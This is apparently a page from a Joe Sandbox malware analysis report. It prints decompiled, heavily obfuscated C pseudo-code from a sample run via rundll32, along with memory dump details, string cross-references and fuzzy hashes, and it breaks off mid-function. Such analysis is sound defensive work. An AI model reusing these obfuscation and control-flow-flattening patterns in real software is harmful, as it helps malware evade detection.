ve, xrefs: 007BB344
&:,, xrefs: 007BB77E
#, xrefs: 007BB4EE
&:,, xrefs: 007BBADF
/i=, xrefs: 007BB19B
&:,, xrefs: 007BB940
W[o3, xrefs: 007BB65E

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &:,$&:,$&:,$&:,$/i=$GA$Kz\Q$W[o3$_}+$gkv$v$(a$ve$~ $#$1P
API String ID: 0-1587349264
Opcode ID: 91b9bb30012de89f6723a77ffa7aed2b65a3f1a681ec067d64fabc26e597aa0e
Instruction ID: 6e055bd62093b1f30a73ceb7cb434691186892d1371db8c11fa4876360990022
Opcode Fuzzy Hash: 91b9bb30012de89f6723a77ffa7aed2b65a3f1a681ec067d64fabc26e597aa0e
Instruction Fuzzy Hash: F352FF711093809FD7B8CF61C58AB8BBBE2BBC4304F10891DE6DA96261D7B58949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 007B5CC4 Relevance: 16.7, Strings: 13, Instructions: 434
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E007B5CC4() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t481;
				signed int _t496;
				void* _t499;
				intOrPtr _t503;
				void* _t539;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				intOrPtr _t553;
				intOrPtr* _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t567;
				signed int* _t568;
				void* _t572;

				_t568 =  &_v1764;
				_v1576 = 0x9a4c1d;
				_v1596 = _v1596 & 0x00000000;
				asm("stosd");
				_t499 = 0x9b91574;
				asm("stosd");
				asm("stosd");
				_v1684 = 0xe59dc4;
				_v1684 = _v1684 | 0xd0a48cbc;
				_v1684 = _v1684 + 0xffff2e59;
				_v1684 = _v1684 ^ 0xd0e4cc7c;
				_v1752 = 0x51b4b3;
				_v1752 = _v1752 ^ 0x5d9a17a0;
				_t550 = 0xb;
				_t555 = 0x76;
				_v1752 = _v1752 * 0xb;
				_v1752 = _v1752 ^ 0x54bb96eb;
				_v1752 = _v1752 ^ 0x53749705;
				_v1632 = 0xaf6c30;
				_v1632 = _v1632 << 6;
				_v1632 = _v1632 ^ 0x2bdb0c02;
				_v1720 = 0x499d0c;
				_v1720 = _v1720 | 0xb1a117f5;
				_v1720 = _v1720 / _t550;
				_v1720 = _v1720 + 0x97c7;
				_v1720 = _v1720 ^ 0x102d1aad;
				_v1704 = 0xc8e3b3;
				_v1704 = _v1704 * 0x32;
				_v1704 = _v1704 ^ 0x0819b8db;
				_v1704 = _v1704 | 0x44ca091a;
				_v1704 = _v1704 ^ 0x6fefc93f;
				_v1668 = 0xa62014;
				_v1668 = _v1668 | 0xeabb5dd4;
				_v1668 = _v1668 * 0x68;
				_v1668 = _v1668 ^ 0x5dcb1e30;
				_v1744 = 0xf6f234;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 ^ 0x80b741fb;
				_v1744 = _v1744 / _t555;
				_v1744 = _v1744 ^ 0x0165dd5f;
				_v1584 = 0x312e96;
				_v1584 = _v1584 + 0xffff2d5f;
				_v1584 = _v1584 ^ 0x003c0d9d;
				_v1712 = 0xa058cf;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 >> 8;
				_t556 = 0x70;
				_v1712 = _v1712 / _t556;
				_v1712 = _v1712 ^ 0x000e60b1;
				_v1624 = 0xe892f9;
				_v1624 = _v1624 | 0x8c579b60;
				_v1624 = _v1624 ^ 0x8cfff2b4;
				_v1616 = 0xaf548d;
				_v1616 = _v1616 << 0xe;
				_v1616 = _v1616 ^ 0xd52eab36;
				_v1732 = 0xb05ea2;
				_v1732 = _v1732 * 0x22;
				_t557 = 0x7e;
				_v1732 = _v1732 / _t557;
				_t558 = 0x6e;
				_v1732 = _v1732 / _t558;
				_v1732 = _v1732 ^ 0x000d3439;
				_v1592 = 0x913a71;
				_v1592 = _v1592 + 0xffff7440;
				_v1592 = _v1592 ^ 0x0095b07c;
				_v1696 = 0x599322;
				_v1696 = _v1696 / _t550;
				_v1696 = _v1696 ^ 0xb13d8f34;
				_v1696 = _v1696 ^ 0xb1384542;
				_v1644 = 0xa16dfa;
				_v1644 = _v1644 ^ 0xe1099bcb;
				_v1644 = _v1644 ^ 0xe1a9d34e;
				_v1648 = 0xb4e11f;
				_v1648 = _v1648 ^ 0x38d2ca48;
				_v1648 = _v1648 ^ 0x386e0f93;
				_v1608 = 0x5a22b;
				_t559 = 0x77;
				_t551 = 0x6a;
				_v1608 = _v1608 * 0x7a;
				_v1608 = _v1608 ^ 0x02a61538;
				_v1680 = 0xefbd86;
				_v1680 = _v1680 ^ 0x59656a46;
				_v1680 = _v1680 + 0xffff500f;
				_v1680 = _v1680 ^ 0x598ded80;
				_v1724 = 0x3ee43e;
				_v1724 = _v1724 + 0x7543;
				_v1724 = _v1724 ^ 0x2e29824a;
				_v1724 = _v1724 + 0xffff57f4;
				_v1724 = _v1724 ^ 0x2e1fc8aa;
				_v1580 = 0xa6d208;
				_v1580 = _v1580 | 0x568c9bfe;
				_v1580 = _v1580 ^ 0x56ae214d;
				_v1636 = 0x6d5924;
				_v1636 = _v1636 ^ 0x925c239d;
				_v1636 = _v1636 ^ 0x923215a4;
				_v1664 = 0x695adc;
				_v1664 = _v1664 / _t559;
				_v1664 = _v1664 + 0x9e91;
				_v1664 = _v1664 ^ 0x000b7b12;
				_v1728 = 0x27fcd;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 / _t551;
				_v1728 = _v1728 ^ 0x000e8750;
				_v1660 = 0x324e38;
				_t560 = 0xd;
				_v1660 = _v1660 / _t560;
				_v1660 = _v1660 ^ 0xc6795c1b;
				_v1660 = _v1660 ^ 0xc67cbc2f;
				_v1672 = 0xd5264d;
				_v1672 = _v1672 ^ 0x5df7965f;
				_v1672 = _v1672 << 0xa;
				_v1672 = _v1672 ^ 0x8ac02156;
				_v1760 = 0x48e2ee;
				_t213 =  &_v1760; // 0x48e2ee
				_t561 = 0x2d;
				_v1760 =  *_t213 / _t561;
				_v1760 = _v1760 ^ 0xd2c1db30;
				_v1760 = _v1760 ^ 0xa53e2936;
				_v1760 = _v1760 ^ 0x77fe21cd;
				_v1740 = 0xf20c88;
				_v1740 = _v1740 / _t551;
				_v1740 = _v1740 | 0xd96c60ad;
				_v1740 = _v1740 << 0xc;
				_v1740 = _v1740 ^ 0xe68a7191;
				_v1588 = 0x8e0aab;
				_t562 = 0x1b;
				_v1588 = _v1588 * 0x60;
				_v1588 = _v1588 ^ 0x354c6054;
				_v1748 = 0x4e8d34;
				_v1748 = _v1748 + 0x9e68;
				_v1748 = _v1748 ^ 0xb589d4ed;
				_v1748 = _v1748 ^ 0xb12a6144;
				_v1748 = _v1748 ^ 0x04e7453a;
				_v1756 = 0x3003da;
				_v1756 = _v1756 << 2;
				_v1756 = _v1756 + 0x3550;
				_v1756 = _v1756 + 0xffff4840;
				_v1756 = _v1756 ^ 0x00bf12fa;
				_v1764 = 0x8da8e8;
				_v1764 = _v1764 * 0x70;
				_v1764 = _v1764 | 0x3d3a45ac;
				_v1764 = _v1764 + 0xffff8f06;
				_v1764 = _v1764 ^ 0x3dfaa955;
				_v1600 = 0x16815c;
				_v1600 = _v1600 | 0x74adb72e;
				_v1600 = _v1600 ^ 0x74bac2ad;
				_v1736 = 0x173f97;
				_v1736 = _v1736 + 0x884f;
				_v1736 = _v1736 ^ 0x83e17d26;
				_v1736 = _v1736 ^ 0x7950511a;
				_v1736 = _v1736 ^ 0xfaacae3a;
				_v1640 = 0x9a0364;
				_v1640 = _v1640 >> 4;
				_v1640 = _v1640 ^ 0x000747da;
				_v1700 = 0xbe1482;
				_v1700 = _v1700 ^ 0x7ff54444;
				_v1700 = _v1700 << 4;
				_v1700 = _v1700 + 0xffff3bda;
				_v1700 = _v1700 ^ 0xf4b38ed0;
				_v1708 = 0xf0c015;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 * 0x59;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 ^ 0x00007652;
				_v1628 = 0xfcf2a2;
				_v1628 = _v1628 + 0x310b;
				_v1628 = _v1628 ^ 0x00fb84b7;
				_v1716 = 0xcaf3e1;
				_v1716 = _v1716 ^ 0x58005d51;
				_v1716 = _v1716 / _t562;
				_v1716 = _v1716 << 0xb;
				_v1716 = _v1716 ^ 0x4f02f929;
				_v1688 = 0xa9bf16;
				_t563 = 0x35;
				_v1688 = _v1688 / _t563;
				_v1688 = _v1688 * 0x4f;
				_v1688 = _v1688 ^ 0x00ffa3e1;
				_v1692 = 0x1a52e4;
				_v1692 = _v1692 | 0xd338ade8;
				_v1692 = _v1692 + 0xffff9820;
				_v1692 = _v1692 ^ 0xd337a700;
				_v1652 = 0xe154f6;
				_v1652 = _v1652 ^ 0xa48feb80;
				_v1652 = _v1652 ^ 0xa466ad28;
				_v1676 = 0x84491a;
				_v1676 = _v1676 + 0x31b5;
				_v1676 = _v1676 + 0x8487;
				_v1676 = _v1676 ^ 0x0081059f;
				_v1604 = 0xb120c5;
				_t564 = 0x4b;
				_t552 = _v1596;
				_t567 = _v1596;
				_v1604 = _v1604 * 0x65;
				_v1604 = _v1604 ^ 0x45e4f2f6;
				_v1656 = 0x2a0a41;
				_v1656 = _v1656 << 0xc;
				_t498 = _v1596;
				_v1656 = _v1656 / _t564;
				_v1656 = _v1656 ^ 0x022e7e7e;
				_v1612 = 0x774513;
				_v1612 = _v1612 | 0x207416f8;
				_v1612 = _v1612 ^ 0x207b64ec;
				_v1620 = 0x205158;
				_v1620 = _v1620 << 0xd;
				_v1620 = _v1620 ^ 0x0a275bbe;
				while(1) {
					L1:
					while(1) {
						_t539 = 0x5c;
						do {
							while(1) {
								L3:
								_t572 = _t499 - 0xa8fcf9f;
								if(_t572 > 0) {
									break;
								}
								if(_t572 == 0) {
									E007B8F9E(_v1688, _v1692, _v1652, _v1676, _t567);
									_t568 =  &(_t568[3]);
									goto L19;
								} else {
									if(_t499 == 0x4b40ba0) {
										_t553 =  *0x7c3e10; // 0x0
										_t554 = _t553 + 0x1c;
										while(1) {
											__eflags =  *_t554 - _t539;
											if( *_t554 == _t539) {
												break;
											}
											_t554 = _t554 + 2;
											__eflags = _t554;
										}
										_t552 = _t554 + 2;
										_t499 = 0x9c63280;
										continue;
									} else {
										if(_t499 == 0x7e93d80) {
											_t567 = E007A1CEC(_v1740, _t552, _t499, _t499, _t552, _v1588, _t498, _v1748, _v1756, _v1764, _v1632, _v1704, _t499, _v1600, _v1668, _v1736, _t499, _v1720, _t499, _v1640,  &_v520);
											_t568 =  &(_t568[0x13]);
											__eflags = _t567;
											if(_t567 == 0) {
												L19:
												_t499 = 0xfa48365;
												_t539 = 0x5c;
												continue;
											} else {
												_t499 = 0xacc4ac0;
												_v1596 = 1;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											}
										} else {
											if(_t499 == 0x9b91574) {
												_push(_v1624);
												_push(_v1684);
												_push(_v1712);
												_push( &_v1560);
												E007B46BB(_v1744, _v1584);
												_t568 = _t568 - 0xc + 0x1c;
												_t499 = 0xf66352a;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											} else {
												if(_t499 != 0x9c63280) {
													goto L27;
												} else {
													_t496 = E007A912C(_v1752, _v1728, _t499, _v1660, _t499, _v1672, _v1760);
													_t498 = _t496;
													_t568 =  &(_t568[5]);
													if(_t496 != 0) {
														_t499 = 0x7e93d80;
														while(1) {
															_t539 = 0x5c;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L24:
								return _v1596;
							}
							__eflags = _t499 - 0xacc4ac0;
							if(_t499 == 0xacc4ac0) {
								E007AD6D8(_t567, _v1708, _t498, _v1628, _v1716);
								_t568 =  &(_t568[4]);
								_t499 = 0xa8fcf9f;
								_t539 = 0x5c;
								goto L27;
							} else {
								__eflags = _t499 - 0xf66352a;
								if(__eflags == 0) {
									_push(_v1592);
									_push(_v1732);
									_t481 = E007BDCF7(_v1616, 0x7a1020, __eflags);
									E007B176B( &_v1040, __eflags);
									_t503 =  *0x7c3e10; // 0x0
									_t431 = _t503 + 0x1c; // 0x1c
									_t432 = _t503 + 0x23c; // 0x23c
									E007B1652(_v1644, __eflags, _t432, _t431, _v1648, _v1608, _t481, 0x104,  &_v520, _v1680,  &_v1560, _v1724,  &_v1040, _v1580);
									E007AA8B0(_v1636, _t481, _v1664);
									_t568 =  &(_t568[0xf]);
									_t499 = 0x4b40ba0;
									goto L1;
								} else {
									__eflags = _t499 - 0xfa48365;
									if(_t499 != 0xfa48365) {
										goto L27;
									} else {
										E007B8F9E(_v1604, _v1656, _v1612, _v1620, _t498);
									}
								}
							}
							goto L24;
							L27:
							__eflags = _t499 - 0xd334e0e;
						} while (_t499 != 0xd334e0e);
						goto L24;
					}
				}
			}

0x007b5cc4
0x007b5cca
0x007b5ce2
0x007b5cea
0x007b5cef
0x007b5cf4
0x007b5cf5
0x007b5cf6
0x007b5cfe
0x007b5d06
0x007b5d0e
0x007b5d16
0x007b5d1e
0x007b5d2b
0x007b5d2e
0x007b5d31
0x007b5d35
0x007b5d3d
0x007b5d45
0x007b5d50
0x007b5d58
0x007b5d63
0x007b5d6b
0x007b5d7b
0x007b5d7f
0x007b5d87
0x007b5d8f
0x007b5d9c
0x007b5da0
0x007b5da8
0x007b5db0
0x007b5db8
0x007b5dc0
0x007b5dcd
0x007b5dd1
0x007b5dd9
0x007b5de6
0x007b5dea
0x007b5dfa
0x007b5dfe
0x007b5e06
0x007b5e11
0x007b5e1c
0x007b5e27
0x007b5e2f
0x007b5e34
0x007b5e3d
0x007b5e40
0x007b5e44
0x007b5e4c
0x007b5e57
0x007b5e62
0x007b5e6d
0x007b5e78
0x007b5e80
0x007b5e8b
0x007b5e9a
0x007b5ea4
0x007b5ea9
0x007b5eb3
0x007b5eb8
0x007b5ebc
0x007b5ec4
0x007b5ecf
0x007b5eda
0x007b5ee5
0x007b5ef5
0x007b5efb
0x007b5f03
0x007b5f0b
0x007b5f16
0x007b5f21
0x007b5f2c
0x007b5f37
0x007b5f42
0x007b5f4d
0x007b5f60
0x007b5f63
0x007b5f66
0x007b5f6d
0x007b5f78
0x007b5f80
0x007b5f88
0x007b5f90
0x007b5f98
0x007b5fa0
0x007b5fa8
0x007b5fb0
0x007b5fb8
0x007b5fc0
0x007b5fcb
0x007b5fd6
0x007b5fe1
0x007b5fec
0x007b5ff7
0x007b6002
0x007b6012
0x007b6016
0x007b601e
0x007b6026
0x007b602e
0x007b6033
0x007b6040
0x007b6044
0x007b604c
0x007b6058
0x007b605b
0x007b605f
0x007b6067
0x007b606f
0x007b6077
0x007b607f
0x007b6084
0x007b608e
0x007b6096
0x007b609c
0x007b60a1
0x007b60a5
0x007b60ad
0x007b60b5
0x007b60bd
0x007b60cd
0x007b60d3
0x007b60db
0x007b60e0
0x007b60e8
0x007b60fb
0x007b60fe
0x007b6105
0x007b6110
0x007b6118
0x007b6120
0x007b6128
0x007b6130
0x007b6138
0x007b6140
0x007b6145
0x007b614d
0x007b6155
0x007b615d
0x007b616a
0x007b616e
0x007b6176
0x007b617e
0x007b6186
0x007b6191
0x007b619c
0x007b61a7
0x007b61af
0x007b61b7
0x007b61bf
0x007b61c7
0x007b61cf
0x007b61da
0x007b61e2
0x007b61ed
0x007b61f5
0x007b61fd
0x007b6202
0x007b620a
0x007b6212
0x007b621a
0x007b6224
0x007b6228
0x007b622d
0x007b6235
0x007b6240
0x007b624b
0x007b6256
0x007b625e
0x007b626e
0x007b6272
0x007b6277
0x007b627f
0x007b628b
0x007b628e
0x007b6297
0x007b629b
0x007b62a3
0x007b62ab
0x007b62b5
0x007b62bd
0x007b62c5
0x007b62d0
0x007b62db
0x007b62e6
0x007b62ee
0x007b62f6
0x007b62fe
0x007b6306
0x007b631b
0x007b631c
0x007b6323
0x007b632a
0x007b6331
0x007b633c
0x007b6344
0x007b634f
0x007b6356
0x007b635a
0x007b6362
0x007b636d
0x007b6378
0x007b6383
0x007b638e
0x007b6396
0x007b63a1
0x007b63a1
0x007b63a6
0x007b63a8
0x007b63a9
0x007b63a9
0x007b63a9
0x007b63a9
0x007b63ab
0x00000000
0x00000000
0x007b63b1
0x007b64ef
0x007b64f4
0x00000000
0x007b63b7
0x007b63bd
0x007b64bb
0x007b64c1
0x007b64c9
0x007b64c9
0x007b64cc
0x00000000
0x00000000
0x007b64c6
0x007b64c6
0x007b64c6
0x007b64ce
0x007b64d1
0x00000000
0x007b63c3
0x007b63c9
0x007b649d
0x007b649f
0x007b64a2
0x007b64a4
0x007b64f7
0x007b64f7
0x007b63a8
0x00000000
0x007b64a6
0x007b64a6
0x007b64ab
0x007b63a6
0x007b63a8
0x00000000
0x007b63a8
0x007b63a6
0x007b63cb
0x007b63d1
0x007b6411
0x007b641f
0x007b6423
0x007b6435
0x007b6436
0x007b643b
0x007b643e
0x007b63a6
0x007b63a8
0x00000000
0x007b63a8
0x007b63d3
0x007b63d9
0x00000000
0x007b63df
0x007b63f8
0x007b63fd
0x007b63ff
0x007b6404
0x007b640a
0x007b63a6
0x007b63a8
0x00000000
0x007b63a8
0x007b63a6
0x007b6404
0x007b63d9
0x007b63d1
0x007b63c9
0x007b63bd
0x007b6546
0x007b6557
0x007b6557
0x007b6501
0x007b6507
0x007b6619
0x007b661e
0x007b6621
0x007b6625
0x00000000
0x007b650d
0x007b650d
0x007b6513
0x007b6558
0x007b6564
0x007b656f
0x007b657d
0x007b65bd
0x007b65ca
0x007b65ce
0x007b65dc
0x007b65f1
0x007b65f6
0x007b65f9
0x00000000
0x007b6515
0x007b6515
0x007b651b
0x00000000
0x007b6521
0x007b653e
0x007b6543
0x007b651b
0x007b6513
0x00000000
0x007b6626
0x007b6626
0x007b6626
0x00000000
0x007b6632
0x007b63a6

Strings

d{ , xrefs: 007B6378
H, xrefs: 007B6096
P5, xrefs: 007B6145
$Ym, xrefs: 007B5FE1
A*, xrefs: 007B633C
FjeY, xrefs: 007B5F80
Q], xrefs: 007B625E
T`L5, xrefs: 007B6105
>>, xrefs: 007B5F98
Cu, xrefs: 007B5FA0
Rv, xrefs: 007B622D
XQ , xrefs: 007B6383
94, xrefs: 007B5EBC

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
API String ID: 0-2231434368
Opcode ID: f05d305abc74a071ce44a2c84b131055ffd1bcf51800997e7ffe3c1b404cc108
Instruction ID: c37fdc492118009f2bf1f400181a30cb1785c8a510879c0f9f1caba031445cb4
Opcode Fuzzy Hash: f05d305abc74a071ce44a2c84b131055ffd1bcf51800997e7ffe3c1b404cc108
Instruction Fuzzy Hash: 63222171508380DFD368CF65C58AA9BFBE2FBC4744F50891DE29A86260D7B98949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007B6DF8 Relevance: 15.5, Strings: 12, Instructions: 510
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E007B6DF8(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				short _v1568;
				short _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1592;
				char _v1596;
				char _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _v1832;
				signed int _v1836;
				signed int _v1840;
				signed int _v1844;
				void* _t583;
				void* _t585;
				void* _t592;
				void* _t603;
				void* _t606;
				void* _t609;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				void* _t620;
				signed int _t674;
				char _t675;
				void* _t677;
				signed int* _t682;

				_t682 =  &_v1844;
				_v1580 = 0x812dcc;
				_v1600 = 0;
				_v1572 = 0;
				_v1568 = 0;
				_v1576 = 0x4b1be1;
				_v1604 = 0xb0e9fc;
				_v1604 = _v1604 >> 0xe;
				_v1604 = _v1604 ^ 0x020002c3;
				_v1816 = 0x316963;
				_v1816 = _v1816 ^ 0x05c37e76;
				_v1816 = _v1816 * 0x44;
				_t609 = __ecx;
				_v1816 = _v1816 << 6;
				_t677 = 0xb42e112;
				_v1816 = _v1816 ^ 0x13878f70;
				_v1648 = 0xe65aa1;
				_v1648 = _v1648 + 0xffffb7c7;
				_v1648 = _v1648 ^ 0x00e866e0;
				_v1608 = 0x4e6d43;
				_v1608 = _v1608 << 3;
				_v1608 = _v1608 ^ 0x027e4d7c;
				_v1792 = 0x62c447;
				_v1792 = _v1792 + 0xfffff9b0;
				_v1792 = _v1792 + 0xffff1ab6;
				_v1792 = _v1792 ^ 0x5826ec20;
				_v1792 = _v1792 ^ 0x58465e47;
				_v1616 = 0xd881ce;
				_t611 = 0x1c;
				_v1616 = _v1616 / _t611;
				_v1616 = _v1616 ^ 0x00049a8c;
				_v1784 = 0x225701;
				_v1784 = _v1784 ^ 0x455f73cc;
				_v1784 = _v1784 + 0x2d0b;
				_v1784 = _v1784 + 0xffff7069;
				_v1784 = _v1784 ^ 0x457ed570;
				_v1656 = 0xa0746c;
				_v1656 = _v1656 << 5;
				_v1656 = _v1656 ^ 0x1405cb88;
				_v1756 = 0x86f3a;
				_v1756 = _v1756 << 0xf;
				_v1756 = _v1756 + 0xffff9aa0;
				_v1756 = _v1756 ^ 0x379e88f8;
				_v1840 = 0x372205;
				_v1840 = _v1840 << 0xb;
				_v1840 = _v1840 >> 1;
				_t612 = 0x47;
				_v1840 = _v1840 * 0x27;
				_v1840 = _v1840 ^ 0x18b0e4c5;
				_v1720 = 0x55473e;
				_v1720 = _v1720 >> 0xe;
				_v1720 = _v1720 + 0xffff4222;
				_v1720 = _v1720 ^ 0xfff7d1f7;
				_v1760 = 0x8a22d4;
				_v1760 = _v1760 ^ 0x5338d916;
				_v1760 = _v1760 / _t612;
				_v1760 = _v1760 ^ 0x01221ec9;
				_v1716 = 0x7ad7ec;
				_v1716 = _v1716 ^ 0xb2734e10;
				_v1716 = _v1716 ^ 0xf628ba0e;
				_v1716 = _v1716 ^ 0x44287105;
				_v1624 = 0x6426f4;
				_v1624 = _v1624 * 0x29;
				_v1624 = _v1624 ^ 0x100ef306;
				_v1728 = 0x3e505e;
				_v1728 = _v1728 >> 8;
				_t613 = 0x3a;
				_v1728 = _v1728 / _t613;
				_v1728 = _v1728 ^ 0x00050efb;
				_v1752 = 0x3958e2;
				_v1752 = _v1752 ^ 0x62ae6d50;
				_v1752 = _v1752 ^ 0x97f7befb;
				_v1752 = _v1752 ^ 0xf561088c;
				_v1688 = 0xb21a91;
				_v1688 = _v1688 ^ 0x7ffc0397;
				_v1688 = _v1688 ^ 0x7f439e8f;
				_v1620 = 0xd8d2d1;
				_v1620 = _v1620 + 0x194e;
				_v1620 = _v1620 ^ 0x00d523c5;
				_v1696 = 0xa820cb;
				_v1696 = _v1696 + 0x8b3c;
				_v1696 = _v1696 ^ 0x00a28581;
				_v1680 = 0x121bc4;
				_t674 = 0x7a;
				_v1680 = _v1680 / _t674;
				_v1680 = _v1680 ^ 0x0006e996;
				_v1744 = 0x9924c6;
				_v1744 = _v1744 << 4;
				_t614 = 0x11;
				_v1744 = _v1744 * 0x36;
				_v1744 = _v1744 ^ 0x04d385a1;
				_v1632 = 0x653a8;
				_v1632 = _v1632 * 0x63;
				_v1632 = _v1632 ^ 0x027c9a7f;
				_v1672 = 0x158278;
				_v1672 = _v1672 + 0xffff088d;
				_v1672 = _v1672 ^ 0x001491ab;
				_v1832 = 0x486b88;
				_v1832 = _v1832 + 0xffff9f3d;
				_v1832 = _v1832 >> 3;
				_v1832 = _v1832 | 0x023d4c2b;
				_v1832 = _v1832 ^ 0x0230cd37;
				_v1612 = 0xd2c4ef;
				_v1612 = _v1612 * 0x5a;
				_v1612 = _v1612 ^ 0x4a177333;
				_v1776 = 0x829598;
				_v1776 = _v1776 << 0xe;
				_v1776 = _v1776 >> 2;
				_v1776 = _v1776 | 0x8c8c5501;
				_v1776 = _v1776 ^ 0xaddb19b6;
				_v1712 = 0x169d18;
				_v1712 = _v1712 / _t614;
				_v1712 = _v1712 >> 0xa;
				_v1712 = _v1712 ^ 0x000c26db;
				_v1704 = 0xb2b50;
				_v1704 = _v1704 ^ 0x2de07b8f;
				_v1704 = _v1704 ^ 0x2de0ad86;
				_v1800 = 0x9652d5;
				_t615 = 3;
				_v1800 = _v1800 * 0x68;
				_v1800 = _v1800 / _t615;
				_v1800 = _v1800 << 0xa;
				_v1800 = _v1800 ^ 0x6cd74e85;
				_v1664 = 0x74acab;
				_v1664 = _v1664 | 0xe18c4dd2;
				_v1664 = _v1664 ^ 0xe1f0b032;
				_v1824 = 0x58e83b;
				_t616 = 0x2c;
				_v1824 = _v1824 * 0x2b;
				_v1824 = _v1824 + 0xffff56af;
				_v1824 = _v1824 ^ 0x0c61ca29;
				_v1824 = _v1824 ^ 0x02809c1e;
				_v1764 = 0x974237;
				_v1764 = _v1764 << 0xb;
				_v1764 = _v1764 * 0x31;
				_v1764 = _v1764 ^ 0x9d674e65;
				_v1736 = 0xc3f98b;
				_v1736 = _v1736 * 0x5e;
				_v1736 = _v1736 | 0x641bd8e3;
				_v1736 = _v1736 ^ 0x67f85735;
				_v1700 = 0xe4f15c;
				_v1700 = _v1700 | 0xddaa88b0;
				_v1700 = _v1700 ^ 0xdde3c6d3;
				_v1844 = 0x9b3502;
				_v1844 = _v1844 ^ 0x47d60286;
				_v1844 = _v1844 / _t616;
				_v1844 = _v1844 ^ 0x0193d551;
				_v1640 = 0xffe1b1;
				_t617 = 0x39;
				_v1640 = _v1640 * 0x7b;
				_v1640 = _v1640 ^ 0x7af2e2c5;
				_v1808 = 0x2876e6;
				_v1808 = _v1808 | 0x109585e0;
				_v1808 = _v1808 << 0xd;
				_v1808 = _v1808 + 0x9cd3;
				_v1808 = _v1808 ^ 0xbefbba98;
				_v1676 = 0xd3b2e1;
				_v1676 = _v1676 << 0xf;
				_v1676 = _v1676 ^ 0xd9748eec;
				_v1836 = 0x3e007f;
				_v1836 = _v1836 + 0xffffe462;
				_v1836 = _v1836 >> 9;
				_v1836 = _v1836 >> 6;
				_v1836 = _v1836 ^ 0x000afa23;
				_v1684 = 0x2c402;
				_v1684 = _v1684 >> 0xa;
				_v1684 = _v1684 ^ 0x0000130c;
				_v1692 = 0x94252b;
				_v1692 = _v1692 / _t617;
				_v1692 = _v1692 ^ 0x000dcb04;
				_v1828 = 0xd5c7f6;
				_v1828 = _v1828 * 0x41;
				_v1828 = _v1828 + 0x5616;
				_v1828 = _v1828 >> 9;
				_v1828 = _v1828 ^ 0x001e39c7;
				_v1740 = 0xceff06;
				_v1740 = _v1740 << 0xe;
				_v1740 = _v1740 << 8;
				_v1740 = _v1740 ^ 0xc18fb5bb;
